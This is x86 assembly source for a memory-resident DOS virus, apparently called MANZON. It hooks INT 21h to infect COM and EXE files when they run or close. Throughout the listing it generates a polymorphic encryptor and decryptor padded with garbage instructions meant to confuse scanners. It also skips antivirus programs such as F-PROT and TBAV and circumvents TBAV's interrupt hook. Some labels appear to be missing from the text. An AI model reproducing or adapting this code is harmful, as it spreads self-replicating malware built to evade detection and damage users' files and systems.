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.model tiny
code_size equ code_end-code_start
filecodelength equ filecodeend-code_start
org 100h
call StartDecryptSimple
call InstallVirus ; Call Install routine
;+ Following code randomly creates an encryptor and a matching :+
;+ decryptor. :+
push bx ; Save filehandle
in ax,40h ; Get random
;+:+:+:+:+:+:+Create random values to use in instructions+:+:+:+:+:+:+:
mov si,offset Rand1a ; First random in decryptor OP-codes
mov di,offset Rand1b ; First random in encryptor OP-codes
mov cx,5 ; 7*2 OP-codes to change
mov [si],al
mov [di],al
add si,4 ; Next OP-code
add di,4 ; -----"-----
xor ax, 'P'-'O'-'O'-'R' ; Generate...
rol ax,5 ; ..new...
xor ax,'R'-'E'-'B'-'O'-'U'-'N'-'D' ; random
loop SetRandom
;+:+:+:+:+:+: Copy instructions from ENCode and DECode :+:+:+:+:+:+:+:
push cs
pop es
mov cx,13 ;Counter, max 13 sequences
mov di,offset CCode1
mov si,offset DECode
mov word ptr ds:[CLength],0h ;Length of decryptor
mov si,offset DECode
in ax,40h ; Get random
ror ax,cl
xor ax,'I'-'M'-'M'-'O'-'R'-'T'-'A'-'L'
sub ax, 'R'-'I'-'O'-'T'
push ax ;Save for later use
mov bl,al
and bl,15 ;Mask only 0-15
shl bl,2 ;mul 4 to get right offset
xor bh,bh
add si,bx ;Get right OP-code
movsd ;move one inst (4 bytes)
std ;count backwards
push cx
push di ;Move code in CCode one inst
push si ;forward, so next inst could
mov si,offset CCode2+13*4 ;be first.
mov di,offset CCode2+14*4
mov cx,14
rep movsd
pop si
mov di,offset CCode2
cmp bl,29 ;Should we use alt. encrypt?
jnb short Garbage ;No, just garbage-instructions
add si,ENCode-DECode-4 ;Get right pos in ENCode
movsd ;move one inst (4 bytes)
sub si,ENCode-DECode ;Back to old pos in DECode
jmp short NoGarbage
sub si,4 ;Same instructions again
pop di
pop cx
add word ptr ds:[CLength],4 ;Add length of decryptor
pop ax ;Get random value again
and ax,128+64 ;Leave de/encryptor like this?
jz short QuitLoop
loop CreateLoop
;+:+:+: Build the first instruction in decryptor (mov cx,??) :+:+:+:+:
xor ax,ax
in al,40h ; Another random
xor al,'A'
and al,7 ;Random between 0 and 7
mov byte ptr ds:[InitCX1],0b9h ;OP-Code for mov cx,?
mov bx,filecodelength
add bx,ax
mov word ptr ds:[InitCX1+1],bx ;Value to put in CX (counter)
;+:+:+: Build to second instruction (mov si, offset codestart) :+:+:+:+:
mov byte ptr ds:[InitSI1],0beh ;OP-Code for mov si,?
mov ax,[entry_p] ;EntryPoint
add ax,word ptr ds:[CLength] ;Length of cryptlines
add ax,15 ;size of rest of loop
add ax,[IPOffs] ;Then add 100h
NoCom: mov word ptr ds:[InitSI1+1],ax ;Value to put in CX (counter)
;+:+:+: Build the instruction that increase SI :+:+:+:+:
and bl,2 ; Get random for inc si
shl bl,2 ; mul 4
mov bh,0
mov si,offset DEcSI
add si,bx ; Get pos in ADD-SI-alts.
;+:+:+: Build the loop-instruction :+:+:+:+:
mov ah,0ffh
sub ah,[CLength] ; Calculate loop operand
sub ah,5
mov al,0e2h ; OP-code for loop
mov [di],ax ; Write loop command
;+:+:+: Write RET at end of encryptionroutine :+:+:+:+:
mov di,offset CCode2 ; Encryptionroutine
add di,word ptr ds:[Clength] ; Find end of ER
mov byte ptr ds:[di],0c3h ; Write a RET
;+:+:+: Write created loader to file :+:+:+:+:
pop bx ; Get filehandle
mov ah,40h ; Function WRITE
mov cx,word ptr ds:[CLength]
add cx,12
mov dx,offset InitCX1
int 21h ; Write decryptor to file
mov word ptr ds:[File_H],bx
;+:+:+:+: Cahnge decryptor so code could use it (put ret instead of inc)
mov di,offset CCode1 ; Encryptionroutine
add di,word ptr ds:[Clength] ; Find end of ER
mov byte ptr ds:[di],0c3h ; Write a RET
;+:+:+:+: Copy enc&dec-call-routine to end of virus :+:+:+:+:
mov si,offset ED_start ; Start of ED-routine
mov di,offset ED_buf ; buffer beyond virus
mov cx,ED_End-ED_start ; Size of ED-routine
rep movsb
call filecodeend ; Call copy
;------ Routine to Encrypt virus, write virus, and decrypt virus
;+ Following code will be copied to memory beyond the virus, :+
;+ and then called. The routine then calls the created :+
;+ encryptor, writing the encrypted virus the the file and :+
;+ then uses the modified decrytor to decrypt the virus again. :+
;+:+:+: Create RandomValue for simple enc/decryptor +:+:+:+
in al,40h
mov byte ptr cs:[DSRan],al
;+:+:+: Encrypt virus, using simple encryptor :+:+:+:+
mov ax,offset EncryptDecryptSimple
call ax
;+:+:+: Encrypt virus, using created encryptor :+:+:+:+
mov si,0100h ; Start of viruscode
mov cx,filecodelength
mov ax,offset CCode2 ; offset to created enc-routine
call ax ; call it
inc si
loop encloop ; Encrypt whole virus
;+:+:+: Write encrypted virus to file :+:+:+:+
mov bx,word ptr ds:[File_H] ; Get filehandle
mov ah,40h ; Function WRITE
mov cx,filecodelength
mov dx,0100h
push cs ; Fake interrupt call
call DoOldInt
;+:+:+: Decrypt virus, using created encryptor :+:+:+:+
mov si,0100h ; Start of viruscode
mov cx,filecodelength
mov ax,offset CCode1
call ax ; Call builded encryptroutine
inc si
loop decloop
;+:+:+: Decrypt virus, using simple decryptor :+:+:+:+
mov ax,offset EncryptDecryptSimple
call ax
;+:+:+: Write random number of extra bytes to file (0-15) :+:+:+:+
mov bx,word ptr ds:[File_H] ; Get filehandle
in ax,40h ; Get random in al
mov ds,ax ; Read from random segment
and ax,0fh ; mask bit 0-3
mov cx,ax ; No. bytes to write
mov ah,40h
add word ptr cs:[CLength],cx ; add length (must know this
xor dx,dx ; when creating EXE-header).
push cs ; Fake interrupt call
call DoOldInt
push cs ; Push back codeseg in DS
pop ds
db 0eah
OldInt dd 0
;+ Following table contains 16 different 4-byte codesqeunces, :+
;+ randomly used by the decryptionroutine. The first 8 affects :+
;+ the decryption algoritm, and has a matching 4-byte inst- :+
;+ ruction in the ENCode-table. The rest is just garbage- :+
;+ instructions, used to make scanning harder. The morpher :+
;+ will pick a random number (1-16) of these instructions, :+
;+ and build the decryption routine. :+
DECode db 02eh,080h,004h ; add byte ptr cs:[si],?
Rand1a db ?
db 02eh,080h,02ch ; sub byte ptr cs:[si],?
Rand2a db ?
db 02eh,080h,034h ; xor byte ptr cs:[si],?
Rand3a db ?
db 02eh,0C0h,004h ; rol byte ptr cs:[si],?
Rand4a db ?
db 02eh,0C0h,00Ch ; ror byte ptr cs:[si],?
Rand5a db ?
db 02eh,0feh,00ch,090h ; dec byte ptr cs:[si]; nop
db 02eh,0feh,004h,090h ; inc byte ptr cs:[si]; nop
db 02eh,0f6h,01ch,090h ; neg byte ptr cs:[si]; nop
;-------The rest is just bullshit, used to confuse scanners
db 053h,08bh,0dch,05bh ; push bx; mov bx,sp; pop bx
db 093h,043h,090h,043h ; xchg bx,ax; inc bx; nop; inc bx
db 040h,08ah,0c4h,048h ; inc ax; mov al,ah; dec ax
db 08ch,0c8h,056h,05fh ; mov ax,cs; push si; pop di;
db 074h,000h,075h,000h ; je $+2; jne $+2;
db 08Bh,0c3h,02bh,0d8h ; mov ax,bx; sub ax,bx
db 003h,0feh,02ch,002h ; add di,si; sub al,2
db 0ebh,001h,0b4h,090h ; jmp $+3; mov ah,90h (b4h + nop)
;+ Following table contains the encryptionversions of the :+
;+ first 8 instructions in the DECode-table. :+
;+ SUB will be ADD, ROR will be ROL etc. :+
ENCode db 02eh,080h,02ch ; sub byte ptr cs:[si],?
Rand1b db ?
db 02eh,080h,004h ; add byte ptr cs:[si],?
Rand2b db ?
db 02eh,080h,034h ; xor byte ptr cs:[si],?
Rand3b db ?
db 02eh,0C0h,00Ch ; ror byte ptr cs:[si],?
Rand4b db ?
db 02eh,0C0h,004h ; rol byte ptr cs:[si],?
Rand5b db ?
db 02eh,0feh,004h,090h ; inc byte ptr cs:[si]; nop
db 02eh,0feh,00ch,090h ; dec byte ptr cs:[si]; nop
db 02eh,0f6h,01ch,090h ; neg byte ptr cs:[si]; nop
;+ Following table contains four different ways to increase :+
;+ SI. Used only in the DECode-routine (CCode1). :+
DEcSI db 083h,0c6h,001h,090h ; add si,1; nop
db 046h,033h,0dbh,0f8h ; inc si; xor bx,bx; clc
db 04eh,046h,046h,0f9h ; dec si; inc si; sinc si; stc
db 083h,0c6h,002h,04eh ; add si,2; dec si
;+ Other data :+
CLength db ? ; Length of decryptor
db ?
ComExe db 0 ; 0=Com, 1=Exe
buffer db 0c3h ; Buffer contains original 3 bytes of
orgep dw 0 ; COM-file. 03ch (RET) will exit program
; in normal DOS. Used only first time.
buffer2 db 0e9h ; JMP OP-code, used to build COM-jump
entry_p dw 0 ; Entrypoint, part of JMP-instruction
Real_CS dw 0
Real_IP dw 0
Real_SS dw 0
Real_SP dw 0
IPOffs dw 100h ; Start offset (100h for comfiles)
;+ INT 21h Entrypoint. Check if virus is calling, and if file :+
;+ should be infected. :+
cmp ax,0DCBAh ; Is virus calling?
jne Notvirus
mov dx,ax
cli ; Clear Interrupts
cld ; Clear Direction
cmp ah,3eh ; Is file going to be closed?
je Short FileClose
cmp ax,4b00h ; Is file going to be executed?
je Short FileExecute
jmp DoOldInt
;+ Following code is called when a file is going to be executed. :+
;+ The file will be opened, and then closed. When the file is :+
;+ closed, the virus will call itself by INT21/3Eh, and the file :+
;+ will be infected. Pretty smart, eh? :) :+
mov ax,3d00h ; Open file for ReadOnly
int 21h
mov bx,ax ; Filehandle in bx
mov ah,3eh
int 21h ; Close file (infect file :))
jmp DoOldInt
;+ Following code is called when a file is going to be closed. :+
;+ The code uses INT2F/1220h to get the adress of JFT-entry, :+
;+ and then INT2F/1216h to get adress of SFT. :+
cmp bx,5 ; Is it a standard device?
jb DoOldInt
push ds
push es
push bx
mov ax,1220h ; Table in es:di
int 2fh
mov ax,1216h
mov bl,byte ptr es:[di]
int 2fh
pop bx
;+ This is a very poor way to check the 2 first characters in a :+
;+ filename, but the asciicode will look nice =) :+
mov ax,word ptr es:[di+20h]
xchg al,ah
add ax,0302h
cmp ax,'F-' + 0302h ; Don't infect F-PROT
je short Skip_Infect
cmp ax,'SC' + 0302h ; Don't infect SCAN
je short Skip_Infect
cmp ax,'TB' + 0302h ; Don't infect TB*.* (TBAV)
je short Skip_Infect
cmp ax,'TO' + 0302h ; Don't infect TOOLKIT
je short Skip_Infect
cmp ax,'FV' + 0302h ; Don't infect FV386
je short Skip_Infect
cmp ax,'FI' + 0302h ; Don't infect FINDVIRU
je short Skip_Infect
cmp ax,'VI' + 0302h ; Don't infect VI*.*
je short Skip_Infect
cmp ax,'K-' + 0302h ; Don't infect R.L's stuff :)
je short Skip_Infect
cmp word ptr es:[di+28h],'OC'
jne short Check_Exe
cmp byte ptr es:[di+2ah],'M'
jne short Check_Exe
or byte ptr es:[di+2],2 ; Set R&W Access
call Infect_Com
cmp word ptr es:[di+28h],'XE'
jne short Skip_Infect
cmp byte ptr es:[di+2ah],'E'
jne short Skip_Infect
or byte ptr es:[di+2],2 ; Set R&W Access
call Infect_Exe
pop es
pop ds
jmp DoOldInt
;+ Infect COM-file :+
push cs
pop ds
mov ax,4202h ; Go to EOF
xor cx,cx
int 21h ; Get filelength in AX
push ax
mov ax,4200h ; Go to SOF
xor cx,cx
int 21h
mov ah,3fh ; Read the 3 first bytes
mov cx,3
mov dx,offset buffer
int 21h
pop ax ; Get Filelength
sub ax,[orgep] ; Virus entrypoint, if file
cmp ax,filecodelength+100h ; is infected
jnb short LooksOk
cmp ax,filecodelength-10h
jb short LooksOk
jmp short DontInfect
mov ax,4202h ; Go to EOF
xor cx,cx
int 21h
cmp ax,62000 ; Is file small enough?
jnb short DontInfect
sub ax,3 ; Make the first 3 bytes
mov word ptr ds:[buffer2+1],ax ; (jmp to eof (viruscode))
mov [IPOffs],100h ; Tell that offset is 100h
push bx
call WriteVirus
pop bx
mov ax,4200h ; Move to SOF
xor cx,cx
int 21h
mov ah,40h ; Write first 3 bytes
mov cx,3
mov dx,offset buffer2
int 21h
;+ Infect EXE-file :+
push cs
pop ds
mov [File_H],bx
mov ax,4200h ; Go to SOF
xor cx,cx
int 21h
mov ah,3fh
mov cx,19h ; Size of EXE-header
mov dx,offset EXE_Header
int 21h
cmp word ptr ds:[EXE_Sig],'MZ' ; Be sure it's a real EXE.
je short ItIsAnExe
cmp word ptr ds:[EXE_Sig],'ZM'
je short ItIsAnExe
jmp short DontInfect
cmp byte ptr ds:[EXE_Win],40h ; Is it a NE-EXE?
je short DontInfect ; Don't infect.
xor eax,eax
xor ebx,ebx
xor ecx,ecx
les ax,dword ptr ds:[EXE_IP] ; get CS:IP in ES:AX
mov ds:Real_CS,es
mov ds:Real_IP,ax
push ax ; Save IP
push es ; Save CS
les ax,dword ptr ds:[EXE_SS] ; get SS:SP in AX:ES
mov ds:Real_SS,ax
mov ds:Real_SP,es
push es
pop bx ; SP in BX
shl eax,4 ; Build real SS:SP in EBX
add eax,ebx
pop cx ; Get CS in CX
pop bx ; Get IP in BX
shl ecx,4 ; Build real CS:IP in ECX
add ecx,ebx
sub eax,ecx ; EAX = SS:SP-CS:IP
cmp eax,(filecodelength+400)
jnb short NotInfected
cmp eax,filecodelength
jb short NotInfected
jmp SkipInfect
xor eax,eax
mov bx,[File_H]
mov ax,4202h ; Go to EOF
xor cx,cx
int 21h ; Get filelength in dx:ax
xor ecx,ecx
xor ebx,ebx
mov cx, word ptr ds:[EXE_Siz] ; Get Siz/512 from header
mov bx, word ptr ds:[EXE_Mod] ; Get Siz mod 512 from header
shl ecx,9 ; Mul 512
add ecx,ebx ; Build Real memsize
mov bx,dx
shl ebx,16
add ebx,eax ; Build filesize in EBX
cmp ecx,ebx ; Is whole file loaded?
jb SkipInfect ; Nope, skip infect
xor ecx,ecx
push ax
pop cx ; Low word in cx
mov ax,dx
shl eax,16
add eax,ecx ; Build filesize in eax
mov edx,eax ; Save filesize
xor ebx,ebx
mov bx, word ptr ds:[EXE_SHe]
shl ebx,4 ; Build real Headersize
sub eax,ebx ; Filesize-Headersize=CS:IP!!
push eax ; Save new CS:IP for later use
call FixSegOffs ; Fix CS:IP so IP<10h
mov dword ptr ds:[EXE_IP],eax
mov [entry_p],ax ; Set virus entrypoint
mov [IPOffs],-3 ; No offset in EXE-files
mov bx,[File_H]
call WriteVirus ; Write virus to EOF
xor eax,eax
xor ebx,ebx
mov ax,word ptr ds:[EXE_Mod] ; Bytes on last page
mov bx,word ptr ds:[EXE_Siz] ; Size/512
shl ebx,9 ; Mul 512
add eax,ebx ; Make progsize
add eax,filecodelength ; Add code_size
xor ebx,ebx
mov bx,word ptr ds:[CLength]
add eax,ebx ; Add decryptsize
add eax,12 ; add InitCX,Loop etc
mov ebx,eax
shr ebx,9 ; Make new progsize/512
and ax,01ffh ; Make modulo
mov word ptr ds:[EXE_Siz],bx
mov word ptr ds:[EXE_Mod],ax
add word ptr ds:[EXE_Min],(code_size+100)/16
mov word ptr ds:[EXE_Max],-1
pop eax ; Get CS:IP
xor ebx,ebx
mov bx,word ptr ds:[CLength] ; Length of decryptor
add eax,ebx
add eax,12 ; Add INIT_CX, INIT_SI etc
add eax,VirStk-Code_Start ; Add pos of Stack
inc eax ; Add one byte and...
and al,0feh ; ...make sure it's even
call FixSegOffs ; Fix so SP<10h
mov word ptr ds:[EXE_SP],ax ; Save new SS:SP
shr eax,16
mov word ptr ds:[EXE_SS],ax ; Save new SS:SP
mov bx,[File_H]
mov ax,4200h ; Go to SOF
xor cx,cx
int 21h
mov ah,40h
mov cx,18h ; Size of EXE-header
mov dx,offset EXE_Header
int 21h ; Write new header
mov ebx,eax
xor ax,ax
shl eax,12
mov ax,bx
mov bx,ax
cmp bx,10h
jb short DoneFix
add eax,00010000h - 00000010h ; 1 para up..
jmp short FixSegOffsLoop
id db 'MANZON (c) '
db 'R' + 1
db 'e' + 2
db 'd' + 3
db '-' + 4
db 'A' + 5
db '/' + 6
db 'I' + 7
db 'R' + 8
;+ Following code will check if virus is resident, +:
;+ allocate memory, copy virus to memory, set the new +:
;+ interrupt vector and transfer control to the program +:
pop si ; Get Start of virus+3
push si ; Save it again for later use.
push ds ; push PSP for later use
push cs
pop ds
;+:+:+:+:+:+:+:+:+:+: Ceck if virus is active :+:+:+:+:+:+:+:+:+:+:+:
mov ax,0DCBAh
int 21h
cmp dx,ax
je short Installed ; Virus found in memory
;+:+:+:+:+:+:+:+:+:+: Allocate memory for virus :+:+:+:+:+:+:+:+:+:+:+:
mov ah,4ah ; Get top of memory
push ax
mov bx,-1
int 21h
sub bx,(code_size)/16+2 ; Resize memory allocation
pop ax
int 21h
mov ah,48h ; Allocate memory for Virus
mov bx,(code_size)/16+1
int 21h
jc short Installed ; If error then exit
dec ax ; dec AX to get pointer to MCB
mov es,ax
mov word ptr es:[1],8 ; Set DOS as owner of memory
sub ax,0fh ; 100 bytes from allocstart
mov es,ax ; to get same offset in TSR-code
;+:+:+:+:+:+:+:+:+:+:+:+: Copy virus to memory :+:+:+:+:+:+:+:+:+:+:+:
sub si,6
mov di,0100h
mov cx,code_size
rep movsb ; move 'em up
;****** Get adress of old INT21h and save it in the Do21-jump.
push es
pop ds
mov ax,3521h
int 21h
cmp word ptr es:[bx],05ebh
jne notbav
cmp byte ptr es:[bx+2],0eah
jne notbav
les bx,es:[bx+3]
jmp tbavfuck
mov word ptr ds:[OldInt+2],es ; Save address to real INT
mov word ptr ds:[OldInt],bx ; in the JMP-string
;****** Set new INT21h
mov dx,offset NewVect ; Set New interruptvector
mov ax,2521h
int 21h
pop ax ; Get PSP
pop si
sub si,106h
cmp word ptr cs:[si+IPoffs],100h ; Are we in a COM-file
je short RestoreComFile
mov ds,ax ; Let ds contain PSP
mov es,ax ; Let es contain PSP
add ax,10h ; Get start of file
add word ptr cs:[si+Real_CS],ax ; Add start seg to CS
add ax,word ptr cs:[si+Real_SS]
mov ss,ax ; Get programs SS
mov sp,word ptr cs:[si+Real_SP] ; Get programs SP
sub sp,2 ; Fix right value for SP
push word ptr cs:[si+Real_CS]
push word ptr cs:[si+Real_IP]
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
mov si,ax
mov di,ax
mov bp,ax
mov ax,cs
mov ds,ax
mov es,ax
add si,offset buffer ; Restore real 3 first bytes
mov di,0100h
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
mov si,ax
mov di,ax
mov bp,ax
push 0100h
call GetIPLabel
mov bp,sp
mov si,[bp]
sub si,GetIPLabel-SimpleCryptStart
mov cx, SimpleCryptEnd-SimpleCryptStart
Call DecryptSimple
pop ax
mov si,offset SimpleCryptStart
mov cx, SimpleCryptEnd-SimpleCryptStart
call DecryptSimple
db 02eh,080h,034h ; xor byte ptr cs:[si],?
DSRan db 0
inc si
loop DecryptSimple
;+ Following code acts like a buffer in memory, and is not :+
;+ included when the virus is written to a file. :+
;+ (Normally known as the heap) :+
filecodeend: ; Label to calculate code_size,
; and to use when jumping to copy
; of EWD-routine
ED_buf db ED_end-ED_start dup (?) ; space for copy of en EWD-routine
File_H dw ? ; Filehandle
; Space for the created decryptionroutine
InitCX1 db ?,?,? ; mov cx,virsize+(0 to 7)
InitSI1 db ?,?,? ; mov si,offset start
CCode1 dd ?,?,?,?,?,?,?,? ; 1 to 15 decryptrows
dd ?,?,?,?,?,?,?
dd ?,? ; + loop statement
; Space for the created encryptionroutine
CCode2 dd ?,?,?,?,?,?,?,? ; 1 to 15 decryptrows
dd ?,?,?,?,?,?,?
dd ?,?
EXE_Header: ; Structure
EXE_Sig dw ? ; MZ or ZM
EXE_Mod dw ? ; size - int(size/512)
EXE_Siz dw ? ; size/512
EXE_Rel dw ? ; Relocation iems
EXE_SHe dw ? ; Size of header/16
EXE_Min dw ? ; Min mem/16
EXE_Max dw ? ; Max mem/16
EXE_SS dw ? ; Stack Segement
EXE_SP dw ? ; Stack Pointer
EXE_CHK dw ? ; Checksum
EXE_IP dw ? ; Instruction Pointer
EXE_CS dw ? ; Code Segment
EXE_Win db ? ; 40h if Windows EXE
VirStk: db 32 dup (?) ; Stack used by the virus (EXE only)
end start